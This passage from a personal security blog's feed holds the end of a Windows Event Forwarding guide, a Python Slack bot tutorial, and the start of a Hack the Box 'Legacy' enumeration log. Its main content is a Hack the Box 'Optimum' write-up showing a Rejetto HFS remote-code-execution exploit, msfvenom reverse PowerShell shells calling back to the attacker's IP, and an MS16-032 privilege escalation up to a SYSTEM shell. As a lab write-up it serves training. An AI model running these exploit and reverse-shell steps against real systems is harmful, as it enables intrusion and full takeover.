<p><code class="language-plaintext highlighter-rouge">"Server=[http://WEC01.internal.kyle.biz.org:5985/wsman/SubscriptionManager/WEC,Refresh=60](http://kyle.internal.biz.org:5985/wsman/SubscriptionManager/WEC%2CRefresh=60)"</code></p>

<p><strong>Step 4:</strong> Click OK</p>

<p><img src="https://i1.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-3.png?fit=818%2C411&amp;ssl=1" alt="" /></p>

<p><strong>Step 5:</strong> Open Command Prompt then enter <em><code class="language-plaintext highlighter-rouge">gpudate /force</code> to apply</em> the modification in our local group policy.</p>

<p><strong>Step 6:</strong> Press Enter</p>

<p><img src="https://i2.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-2.png?fit=818%2C463&amp;ssl=1" alt="" /></p>

<p><strong>Step 7:</strong> Go back to the WEC server then check if the Baseline events already getting logs from our event source machine.</p>

<p><img src="https://i1.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-5.png?fit=818%2C518&amp;ssl=1" alt="" /></p>

<p><strong>Step 8:</strong> We can already see that the events are already forwarded and ready to use for analysis.</p>

<p><img src="https://i1.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-9.png?fit=818%2C534&amp;ssl=1" alt="" /></p>

<p>So that’s it! I hope you learned something new today and I hope you’ll be using this example to reduce the gap and have greater visibility on your network.</p>

<h2 id="references">References:</h2>

<ul>
  <li><a href="https://docs.microsoft.com/en-us/windows/threat-protection/use-windows-event-forwarding-to-assist-in-instrusion-detection">https://docs.microsoft.com/en-us/windows/threat-protection/use-windows-event-forwarding-to-assist-in-instrusion-detection</a></li>
  <li><a href="https://docs.microsoft.com/en-us/windows/win32/wec/setting-up-a-source-initiated-subscription">https://docs.microsoft.com/en-us/windows/win32/wec/setting-up-a-source-initiated-subscription</a></li>
</ul>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[Introduction As your organization grows, a lot more log collectors either commercial or freeware are needed to be installed on your network to get logs from different servers running on Windows or …]]></summary></entry><entry><title type="html">Hack the Box Optimum</title><link href="https://blog.anotsodev.me/2017/10/28/hack-the-box-optimum.html" rel="alternate" type="text/html" title="Hack the Box Optimum" /><published>2017-10-28T00:00:00+00:00</published><updated>2017-10-28T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2017/10/28/hack-the-box-optimum</id><content type="html" xml:base="https://blog.anotsodev.me/2017/10/28/hack-the-box-optimum.html"><![CDATA[<p>This is a write-up of the retired Optimum box on Hack the Box.</p>

<p>First thing I did was to fire up nmap and ran this command.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -sV -sC -oA optimum 10.10.10.8
</code></pre></div></div>

<p>And got this result.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Nmap scan report for 10.10.10.8
Host is up (0.42s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.77 seconds
</code></pre></div></div>

<p>So only port 80 was open and it was a HttpFileServer.</p>

<p><em><strong>HTTP File Server</strong>, otherwise known as HFS, is a free web server specifically designed for publishing and sharing files. The complete feature set differs from other web servers; it lacks some common features, like CGI, or even</em> ability *to run as a Windows service, but includes, for example, counting file downloads. It is even advised against using it as an ordinary web server.<br />
*</p>

<p><em>Source:</em> https://en.wikipedia.org/wiki/HTTP_File_Server</p>

<p>I opened the service on the web browser and it was just a dashboard of the HFS.</p>

<p>The version of the HFS was 2.3 so I searchploited it.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/HTB/Optimum# searchsploit hfs
------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms/)
------------------------------------------------------------------------------------------------- ----------------------------------
Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service | osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem Exploit (Denial of Service) | osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure | osx/local/35488.c
Apple Mac OSX xnu 1228.x - (hfs-fcntl) Kernel Privilege Escalation | osx/local/8266.txt
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution | windows/remote/37985.py
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service | linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt
------------------------------------------------------------------------------------------------- ----------------------------------
</code></pre></div></div>

<p>So there were multiple exploits available for HFS version 2.3.</p>

<p>The first exploit that I used was this.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
</code></pre></div></div>

<p>I copied the exploit and named it as exploit.py on my directory. After I copied the exploit, I modified a few lines of codes and entered my IP address and local port number to listen to.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/HTB/Optimum# nano exploit.py

# changed the following lines
ip_addr = "10.10.14.116" #local IP address
local_port = "9999" # Local Port number

root@kali:~/Documents/HTB/Optimum# python exploit.py 
[.]Something went wrong..!
Usage is :[.] python exploit.py &lt;Target IP address&gt; &lt;Target Port Number&gt;
Don't forgot to change the Local IP address and Port number on the script
root@kali:~/Documents/HTB/Optimum# python exploit.py 10.10.10.8 80

# Open new Terminal Tab
root@kali:~/Documents/HTB/Optimum# nc -lvp 9999
</code></pre></div></div>

<p>After running the exploit and opened a new terminal for the netcat listener, I got an access to the shell. This means that the exploit worked, however, I was not able to do other things so I need to have a meterpreter access to run the privilege escalation suggester and use the suggested privesc exploits to have a root access on the system.</p>

<p>Good thing there was a metasploit module of the HFS exploit. So I fired up metasploit and used the exploit.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf &gt; search hfs

Matching Modules
================

Name Disclosure Date Rank Description
 ---- --------------- ---- -----------
 exploit/multi/http/git_client_command_exec 2014-12-18 excellent Malicious Git and Mercurial HTTP Server For CVE-2014-9390
 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Rejetto HttpFileServer Remote Command Execution
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf &gt; use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) &gt; set RHOST 10.10.10.8
RHOST =&gt; 10.10.10.8
msf exploit(rejetto_hfs_exec) &gt; set SRVPORT 7777
SRVPORT =&gt; 7777
msf exploit(rejetto_hfs_exec) &gt; run

[*] Started reverse TCP handler on 10.10.14.116:4444 
[*] Using URL: http://0.0.0.0:7777/YqQuLmjEaXD
[*] Local IP: http://192.168.8.102:7777/YqQuLmjEaXD
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /YqQuLmjEaXD
[*] Sending stage (179267 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.116:4444 -&gt; 10.10.10.8:49239) at 2017-10-14 09:51:34 -0400
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\pCrVCNhk.vbs' on the target
</code></pre></div></div>

<p>Got a meterpreter session.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>meterpreter &gt;
meterpreter &gt; sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
</code></pre></div></div>

<p>I needed to background first the session so that I am able to run the exploit suggester for windows.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>meterpreter &gt; background
[*] Backgrounding session 1...

msf exploit(rejetto_hfs_exec) &gt; search suggester

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
post/multi/recon/local_exploit_suggester normal Multi Recon Local Exploit Suggester

msf exploit(rejetto_hfs_exec) &gt; use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) &gt; set SESSION 1
SESSION =&gt; 1
msf post(local_exploit_suggester) &gt; run

[*] 10.10.10.8 - Collecting local exploits for x86/windows...
[*] 10.10.10.8 - 37 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.8 - exploit/windows/local/ms_ndproxy: The target service is running, but could not be validated.
[*] Post module execution completed
msf post(local_exploit_suggester) &gt; use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(ms16_032_secondary_logon_handle_privesc) &gt; 
msf exploit(ms16_032_secondary_logon_handle_privesc) &gt; run
msf exploit(ms16_032_secondary_logon_handle_privesc) &gt; set SESSION 2
[*] Started reverse TCP handler on 192.168.8.102:4444 
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\Desktop\cbOzoCyJAykO.txt...
[*] Compressing script contents...
[+] Compressed size: 3596
[*] Executing exploit script...

[+] Cleaned up C:\Users\kostas\Desktop\cbOzoCyJAykO.txt
[*] Exploit completed, but no session was created.
msf exploit(ms16_032_secondary_logon_handle_privesc) &gt;
</code></pre></div></div>

<p>The ms16_032_secondary_logon_handle_privesc exploit was an exploit for Windows 2012 R2 (Build 9600) but it didn’t work and there was no session created. However, there was a manual exploit script for the ms16_032_secondary_logon_handle_privesc and I will use that exploit to have a root access on the system.</p>

<p>So I downloaded the exploit from exploitdb.</p>

<p>https://www.exploit-db.com/exploits/39719/</p>

<p>The exploit was a powershell script. So for the exploit to work, I needed to have an interactive powershell access on the system to run the script, so what I did was to create a reverse powershell payload using msfvenom.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/HTB/Optimum# msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.116 LPORT=5555 -f exe &gt; shell.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1802 bytes
Final size of exe file: 8192 bytes
</code></pre></div></div>

<p>After the payload was created, I fired up metasploit on the other tab to use the handler to catch the reverse powershell.</p>

<p>Reverse Powershell Tab</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf &gt; use exploit/multi/handler
msf exploit(handler) &gt; set payload payload/windows/x64/powershell_reverse_tcp
[-] The value specified for payload is not valid.
msf exploit(handler) &gt; set payload windows/x64/powershell_reverse_tcp
payload =&gt; windows/x64/powershell_reverse_tcp
msf exploit(handler) &gt; set LHOST 10.10.14.116
LHOST =&gt; 10.10.14.116
msf exploit(handler) &gt; set LPORT 5555
LPORT =&gt; 5555
msf exploit(handler) &gt; exploit -j -z
[*] Exploit running as background job 0.
msf exploit(handler) &gt; 
[*] Started reverse SSL handler on 10.10.14.116:5555

msf exploit(handler) &gt;
</code></pre></div></div>

<p>After creating the handler I uploaded and executed the reverse powershell.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>meterpreter &gt; pwd
C:\Users\kostas\Desktop
meterpreter &gt; upload shell.exe
[*] uploading : shell.exe -&gt; shell.exe
[*] uploaded : shell.exe -&gt; shell.exe
meterpreter &gt; execute -f shell.exe
</code></pre></div></div>

<p>On the Reverse Powershell Tab, I got a powershell session.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf exploit(handler) &gt; [*] Powershell session session 2 opened (10.10.14.116:5555 -&gt; 10.10.10.8:49251) at 2017-10-14 10:22:40 -0400
</code></pre></div></div>

<p>So it’s time to modify the ms16-032 script to work.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
        $CallResult = [Advapi32]::CreateProcessWithLogonW(
            "user", "domain", "pass",
            0x00000002, "C:\Windows\System32\cmd.exe", "", #change this to your reverse shell.
            0x00000004, $null, $GetCurrentPath,
            [ref]$StartupInfo, [ref]$ProcessInfo)
</code></pre></div></div>

<p>I needed to create another reverse shell using msfvenom and change a few line of codes in the ms16-032 script to execute the reverse shell as root.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
        $CallResult = [Advapi32]::CreateProcessWithLogonW(
            "user", "domain", "pass",
            0x00000002, "C:\Users\kostas\Desktop\yourrevshell.exe", "", #changed
            0x00000004, $null, $GetCurrentPath,
            [ref]$StartupInfo, [ref]$ProcessInfo)
</code></pre></div></div>

<p>I needed to open another handler again on metasploit to catch the reverse shell and to have a root access on the system.</p>

<p>And after modifying the script and creating the handler, it’s time to execute the exploit using the interactive powershell.</p>

<p><strong>Reverse Powershell Tab</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS C:\Users\kostas\Desktop&gt; ./MS16-032.ps1
PS C:\Users\kostas\Desktop&gt; Import-Module ./MS16-032.ps1
PS C:\Users\kostas\Desktop&gt; Invoke-MS16-032
__ __ ___ ___ ___ ___ ___ ___ 
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
 
[by b33f -&gt; @FuzzySec]

[?] Operating system core count: 2
[&gt;] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2172

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[&gt;] Wiping current impersonation token
[&gt;] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2168
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[&gt;] Duplicating SYSTEM token
[&gt;] Starting token race
[&gt;] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

PS C:\Users\kostas\Desktop&gt;
</code></pre></div></div>

<p>And on the reverse shell handler tab, you can see that it already caught the reverse shell executed by the exploit and there it goes, I already had a root access on the system.</p>

<p><strong>Reverse Shell Tab</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf exploit(handler) &gt; 
[*] Sending stage (179267 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.14.116:1337 -&gt; 10.10.10.8:50253) at 2017-10-14 12:23:26 -0400

msf exploit(handler) &gt; sessions -i 1
[*] Starting interaction with 1...

meterpreter &gt; shell
Process 752 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop&gt;whoami
whoami
nt authority\system

C:\Users\kostas\Desktop&gt;more user.txt.txt
more user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73

C:\Users\kostas\Desktop&gt;cd C:\Users
cd C:\Users

C:\Users&gt;cd Administrator
cd Administrator

C:\Users\Administrator&gt;cd Desktop
cd Desktop

C:\Users\Administrator\Desktop&gt;more root.txt
more root.txt
51ed1b36553c8461f4552c2e92b3eeed

C:\Users\Administrator\Desktop&gt;
</code></pre></div></div>

<p>I have now the user and root hashes of the box.</p>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[This is a write-up of the retired Optimum box on Hack the Box. First thing I did was to fire up nmap and ran this command. nmap -sV -sC -oA optimum 10.10.10.8 And got this result. Nmap scan report …]]></summary></entry><entry><title type="html">Building a Slack Bot with Python</title><link href="https://blog.anotsodev.me/2017/09/28/building-a-slack-bot-with-python.html" rel="alternate" type="text/html" title="Building a Slack Bot with Python" /><published>2017-09-28T00:00:00+00:00</published><updated>2017-09-28T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2017/09/28/building-a-slack-bot-with-python</id><content type="html" xml:base="https://blog.anotsodev.me/2017/09/28/building-a-slack-bot-with-python.html"><![CDATA[<p>The slack bot that I will be building has a feature that will automatically fetch the latest tweets from my subscribed lists (Information Security related) on Twitter.</p>

<p>Thanks to this guide I was able to understand how to build a simple slack bot.</p>

<p>https://www.fullstackpython.com/blog/build-first-slack-bot-python.html</p>

<h2 id="requirements">Requirements</h2>

<ol>
  <li>Python 2.x.x or 3.x.x</li>
  <li>Slack Account with a workspace to access the slack API</li>
  <li>slackclient python library</li>
  <li>Twitter account for the API access and subscribed with at least 1 list</li>
  <li>twitter python library</li>
</ol>

<h2 id="getting-started">Getting Started</h2>

<p>After installing either Python 2.x.x or 3.x.x, use the following commands to install the needed python libraries.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pip install slack client
pip install twitter
</code></pre></div></div>

<h2 id="getting-the-slack-api-access-token">Getting the Slack API Access Token</h2>

<p>After running the following commands, login to slack and make a workspace for you to be able to generate Slack API Tokens.</p>

<p>Click the site below to create new bot user.</p>

<p>https://api.slack.com/bot-users</p>

<p>Click the “creating a new bot user” to create a new bot user.</p>

<p>Below is the screenshot on creating a new bot user.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/09/screenshot-2017-9-28-bot-users.png?resize=654%2C365&amp;ssl=1" alt="Screenshot-2017-9-28 Bot Users" /></p>

<p>Enter the username of your bot.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/09/screenshot-2017-9-28-bots.png?resize=960%2C557&amp;ssl=1" alt="Screenshot-2017-9-28 Bots" /></p>

<p>You will be redirected here after you clicked the Add bot integration button.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/09/screenshot-2017-9-28-bots-slack-app-directory.png?resize=970%2C473&amp;ssl=1" alt="Screenshot-2017-9-28 Bots Slack App Directory" /></p>

<p>You have now the API token for your bot. Please note the warning message.</p>

<p>You can also customize your bot like uploading a profile picture and describing the features of your bot. After customizing your bot, scroll down and click the Save Integration button.</p>

<p>The most practical method of securing secret tokens it to export it as an environment variable.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>export SLACK_BOT_TOKEN='your slack token pasted here'
</code></pre></div></div>

<p>But what I will be doing is paste the token to a config.py file and access it using the python file of the bot.</p>

<h2 id="getting-the-bots-id">Getting the Bot’s ID</h2>

<p>Here is the modified code snippet from https://www.fullstackpython.com/blog/build-first-slack-bot-python.html</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import os
from slackclient import SlackClient

config = {}
execfile("config.py", config)

BOT_NAME = 'kairubot'

slack_client = SlackClient(config['slack_api'])

if __name__ == "__main__":
    api_call = slack_client.api_call("users.list")
    if api_call.get('ok'):
    # retrieve all users so we can find our bot
    users = api_call.get('members')
       for user in users:
          if 'name' in user and user.get('name') == BOT_NAME:
              print("Bot ID for '" + user['name'] + "' is " + user.get('id'))
          else:
              print("could not find bot user with the name " + BOT_NAME)
</code></pre></div></div>

<p>Running this program will output the Bot’s ID.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Users\Kyle\Documents\Projects\slack-bot&gt;python test.py
Bot ID for 'kairubot' is U79K9K9FB
</code></pre></div></div>

<p>You can now copy and paste the ID of your bot to the config.py file.</p>

<p>Below is the template of the config.py file.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Twitter Access Tokens
consumer_key = ""
consumer_secret = ""
access_key = ""
access_secret = ""

# Slack Access Tokens
slack_api = ""
bot_id = "U772P5C83"
</code></pre></div></div>

<h2 id="getting-the-twitter-access-tokens">Getting the Twitter Access Tokens</h2>

<p>Now we already have our Slack API Token for our bot and the ID of our bot, next step is to get the tokens for user authentication needed to use the Twitter API.</p>

<p>Click the link below to generate these tokens.</p>

<p>https://apps.twitter.com/app/new</p>

<p>You must be logged in on twitter before creating an application.</p>

<p>You just need to fill up the following fields to create your new application.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/09/screenshot-2017-9-28-twitter-application-management.png?resize=1058%2C657&amp;ssl=1" alt="Screenshot-2017-9-28 Twitter Application Management" /></p>

<p>After filling up the necessary fields and created your new application, you will be redirected to your application’s management page. In order to generate your access tokens, click the Keys and Access Tokens tab then scroll down then click the create new access token button there.</p>

<p>Your application now has generated your access tokens. You just need to paste the tokens on the config.py</p>

<p>Example config.py</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Twitter Access Tokens
consumer_key = "k1v..."
consumer_secret = "HsDc..."
access_key = "770..."
access_secret = "5UN..."

#Slack Access Tokens
slack_api = "xoxb-"
bot_id = "U772P5C83"
</code></pre></div></div>

<p>You now have the necessary tokens to make an API requests to Slack and Twitter.</p>

<p>You can now use the source code of the program below to use and retrieve latest tweets from the subscribed lists.</p>

<p>I’ve used the examples here on how to use the Twitter API to get tweets from Twitter.</p>

<p>https://github.com/ideoforms</p>

<p>The feature of this bot is to manually or automatically fetch latest tweets from the subscribed lists.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import time
import sys
from slackclient import SlackClient
from twitter import *

config = {}
execfile("config.py", config)

#bot's id 
BOT_ID = config["bot_id"]

# instantiate slack
# Note: always secure the api token
slack_client = SlackClient(config["slack_api"])

AT_BOT = "&lt;@" + BOT_ID + "&gt;"

# list of commands
EXAMPLE_COMMANDS = "help, retrieve, autoretrieve"
COMMANDS = ['help', 'retrieve', 'autoretrieve']

#constants
DEFAULT_INTERVAL = 5

def auto_retrieve(channel, start, default_interval):
    n = default_interval;
    response = "Starting...\n"
    time.sleep(3)
    response += "Will retrieve statuses from the infosec list every 1 hour. Auto Retrieve Intervals = "+str(DEFAULT_INTERVAL)+"\n"
    slack_client.api_call("chat.postMessage", channel=channel,
                                  text=response, as_user=True)
    while start and n &gt; 0:
        response = retrieve()
        slack_client.api_call("chat.postMessage", channel=channel,
                                  text=response, as_user=True)
        n-=1
        # 3600 seconds = 1 hour
        time.sleep(3600)
    return "Auto retrieval stopped."

def retrieve():
    # will use this example on retrieving tweets https://github.com/ideoforms/python-twitter-examples/blob/master/twitter-home-timeline.py
    # config.py https://github.com/ideoforms/python-twitter-examples/blob/master/config.py
    response = ""
    response += "Retrieving 50 tweets... \n\n"

    users = [ "kylehalog" ]

    twitter = Twitter(auth = OAuth(config["access_key"], config["access_secret"], config["consumer_key"], config["consumer_secret"]))

    for user in users:
        result = twitter.lists.list(screen_name = user)
        for list in result:
            list_slug = list["slug"]
            list_str_id = list["id"]
            tweet_count = 50
            statuses = twitter.lists.statuses(slug = list_slug, list_id = list_str_id, count = tweet_count)
            for status in statuses:
                response += "(%s) @%s %s" % (status["created_at"], status["user"]["screen_name"], status["text"]) + "\n"
    return response

def command_handler(command, channel):

    response = "Sorry but I don't get what you mean. I can only understand these commands: " + EXAMPLE_COMMANDS
    if command in COMMANDS:
        if command == 'help':
            response = "\
            List of available commands: \n \
            help - display this message\n \
            retrieve - retrieve and output the latest tweets about infosec\n \
            autoretrieve - automatically retrieve and output tweets about infosec every 1 hour"
        
        elif command == 'retrieve':
            response = retrieve()

        elif command == 'autoretrieve':
            response = auto_retrieve(channel, True, DEFAULT_INTERVAL)
            
                
    slack_client.api_call("chat.postMessage", channel=channel,
                          text=response, as_user=True)
def slack_output_parser(rtm_output):
    
    output_list = rtm_output
    if output_list and len(output_list) &gt; 0:
        for output in output_list:
            if output and 'text' in output and AT_BOT in output['text']:
                # return text after the @ mention, whitespace removed
                return output['text'].split(AT_BOT)[1].strip().lower(), \
                       output['channel']
    return None, None

if __name__ == "__main__":
    READ_WEBSOCKET_DELAY = 1
    if slack_client.rtm_connect():
        print("Kairu Bot is connected and running!")
        while True:
            command, channel = slack_output_parser(slack_client.rtm_read())
            if command and channel:
                command_handler(command, channel)
            time.sleep(READ_WEBSOCKET_DELAY)
    else:
        print("Connection Failed. Invalid Slack token or Bot ID")
</code></pre></div></div>

<h2 id="starting-the-bot">Starting the Bot</h2>

<p>To run the program, just use this command and invite your bot to your slack channel.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python kairu-bot.py
</code></pre></div></div>

<p>Example bot usage on slack</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/09/screenshot-2017-9-28-supersecretchannel-project-graduate-slack.png?resize=1127%2C495&amp;ssl=1" alt="Screenshot-2017-9-28 supersecretchannel Project Graduate Slack" /></p>

<p>So this is how to build a slack bot with python.</p>

<p>You are free to modify and use the source code on my Github below. You can also add features as many as you want.</p>

<p>https://github.com/anotsodev/slack-bot</p>

<p>Thank you for your time! 🙂</p>

<p><em>Featured Image credits to</em> <em><a href="https://www.wired.com/wp-content/uploads/2015/08/SlackBot-featured1.jpg">wired.com</a></em></p>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[The slack bot that I will be building has a feature that will automatically fetch the latest tweets from my subscribed lists (Information Security related) on Twitter. Thanks to this guide I was ab…]]></summary></entry><entry><title type="html">Hack the Box Legacy Get System no Jutsu</title><link href="https://blog.anotsodev.me/2017/09/10/hack-the-box-legacy-get-system-no-jutsu.html" rel="alternate" type="text/html" title="Hack the Box Legacy Get System no Jutsu" /><published>2017-09-10T00:00:00+00:00</published><updated>2017-09-10T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2017/09/10/hack-the-box-legacy-get-system-no-jutsu</id><content type="html" xml:base="https://blog.anotsodev.me/2017/09/10/hack-the-box-legacy-get-system-no-jutsu.html"><![CDATA[<p>This post contains the actual commands that I used in hacking and getting the user and root hashes on HTB Legacy Box.</p>

<p><strong>Enumeration</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Downloads/enum4linux-0.8.9/enum4linux-0.8.9$ sudo ./enum4linux.pl -a 10.10.10.4
[sudo] password for kaipowered:
WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jul 18 22:42:06 2017

==========================
| Target Information |
==========================
Target ........... 10.10.10.4
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

==================================================
| Enumerating Workgroup/Domain on 10.10.10.4 |
==================================================
[+] Got domain/workgroup name: HTB

==========================================
| Nbtstat Information for 10.10.10.4 |
==========================================
Looking up status of 10.10.10.4
LEGACY &lt;00&gt; - B &lt;ACTIVE&gt; Workstation Service
HTB &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Domain/Workgroup Name
LEGACY &lt;20&gt; - B &lt;ACTIVE&gt; File Server Service
HTB &lt;1e&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Browser Service Elections
HTB &lt;1d&gt; - B &lt;ACTIVE&gt; Master Browser
..__MSBROWSE__. &lt;01&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Master Browser

MAC Address = 00-50-56-97-0E-E1

===================================
| Session Check on 10.10.10.4 |
===================================
[+] Server 10.10.10.4 allows sessions using username '', password ''

=========================================
| Getting domain SID for 10.10.10.4 |
=========================================
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid from server
error: NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup

====================================
| OS information on 10.10.10.4 |
====================================
[+] Got OS info for 10.10.10.4 from smbclient: Domain=[LEGACY] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
[E] Can't get OS info with srvinfo: NT_STATUS_ACCESS_DENIED

===========================
| Users on 10.10.10.4 |
===========================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

=======================================
| Share Enumeration on 10.10.10.4 |
=======================================
[E] Can't list shares: NT_STATUS_ACCESS_DENIED

[+] Attempting to map shares on 10.10.10.4

==================================================
| Password Policy Information for 10.10.10.4 |
==================================================
[E] Unexpected error from polenum.py:
Traceback (most recent call last):
File "/usr/local/bin/polenum.py", line 32, in &lt;module&gt;
from impacket import uuid
ImportError: No module named impacket
[E] Failed to get password policy with rpcclient

============================
| Groups on 10.10.10.4 |
============================

[+] Getting builtin groups:
[E] Can't get builtin groups: NT_STATUS_ACCESS_DENIED

[+] Getting builtin group memberships:

[+] Getting local groups:
[E] Can't get local groups: NT_STATUS_ACCESS_DENIED

[+] Getting local group memberships:

[+] Getting domain groups:
[E] Can't get domain groups: NT_STATUS_ACCESS_DENIED

[+] Getting domain group memberships:

=====================================================================
| Users on 10.10.10.4 via RID cycling (RIDS: 500-550,1000-1050) |
=====================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.

===========================================
| Getting printer info for 10.10.10.4 |
===========================================
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid from server
error: NT_STATUS_ACCESS_DENIED

enum4linux complete on Tue Jul 18 22:42:49 2017
